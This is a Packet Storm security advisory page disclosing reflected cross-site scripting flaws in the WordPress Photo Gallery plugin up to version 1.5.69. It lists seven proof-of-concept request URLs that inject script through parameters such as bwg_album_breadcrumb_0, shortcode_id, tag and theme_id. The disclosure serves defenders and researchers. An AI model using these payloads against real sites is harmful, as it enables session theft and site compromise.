what you don't know can hurt you

WordPress Photo Gallery 1.5.69 Cross Site Scripting

WordPress Photo Gallery 1.5.69 Cross Site Scripting
Posted Apr 19, 2021
Authored by ThuraMoeMyint

WordPress Photo Gallery plugin versions 1.5.69 and below suffer from multiple reflective cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
MD5 | b5c0688f0cda1e2a8251928650a32477

WordPress Photo Gallery 1.5.69 Cross Site Scripting

Change Mirror Download
Researcher Name: ThuraMoeMyint
Twitter: https://twitter.com/mgthuramoemyint
Vendor Url: https://wordpress.org/plugins/photo-gallery/

"Photo Gallery by 10Web / Mobile-Friendly Image Gallery" (photo-gallery) Multiple RXSS

The parameter bwg_album_breadcrumb_0 is able to inject malicious javascript code.
Affected Version < 1.5.68

vuln.com/wp-admin/admin-ajax.php?action=bwg_frontend_data&bwg_album_breadcrumb_0=[{"id":"1'><img/src=x onerror=alert(1)>","page":1},{"id":"1","page":1}]&gallery_type=album_extended_preview

The parameter "shortcode_id" is able to inject malicious javascript.
Affected Version < 1.5.68

vuln.com/wp-admin/admin-ajax.php?action=bwg_frontend_data&gallery_type=image_browser&gallery_id=5&tag=0&album_id=0&theme_id=1&shortcode_id=9%22%20onmouseover=alert(id)//

The parameter "album_gallery_id_0" is able to inject malicious javascript.
Affected Version <= 1.5.68

vuln.com/wp-admin/admin-ajax.php?action=bwg_frontend_data&album_gallery_id_0=%27);}%20alert(1);//

The parameter "bwg_album_search_0" is able to inject malicious javascript.
Affected Version <= 1.5.68

vuln.com/wp-admin/admin-ajax.php?action=bwg_frontend_data&bwg_album_search_0=%22%20autofocus%20onfocus%3D%22alert(1)

The parameter "tag" is able to inject malicious javascript.
Affected Version <= 1.5.68

vuln.com/wp-admin/admin-ajax.php?action=bwg_frontend_data&tag=%22%20onmouseover=alert(1)%3E

The parameter "type_0" is able to inject malicious javascript.
Affected Version <= 1.5.68

vuln.com/wp-admin/admin-ajax.php?action=bwg_frontend_data&type_0=%27);}%20alert(document.domain);//

The parameter "theme_id" is able to inject malicious javascript.
Affected Version <= 1.5.69

vuln.com/wp-admin/admin-ajax.php?action=bwg_frontend_data&theme_id=%22%20onmouseover=alert(1)%3E



Login or Register to add favorites

File Archive:

January 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    2 Files
  • 2
    Jan 2nd
    0 Files
  • 3
    Jan 3rd
    20 Files
  • 4
    Jan 4th
    4 Files
  • 5
    Jan 5th
    37 Files
  • 6
    Jan 6th
    20 Files
  • 7
    Jan 7th
    4 Files
  • 8
    Jan 8th
    0 Files
  • 9
    Jan 9th
    0 Files
  • 10
    Jan 10th
    18 Files
  • 11
    Jan 11th
    8 Files
  • 12
    Jan 12th
    19 Files
  • 13
    Jan 13th
    31 Files
  • 14
    Jan 14th
    2 Files
  • 15
    Jan 15th
    0 Files
  • 16
    Jan 16th
    0 Files
  • 17
    Jan 17th
    0 Files
  • 18
    Jan 18th
    0 Files
  • 19
    Jan 19th
    0 Files
  • 20
    Jan 20th
    0 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close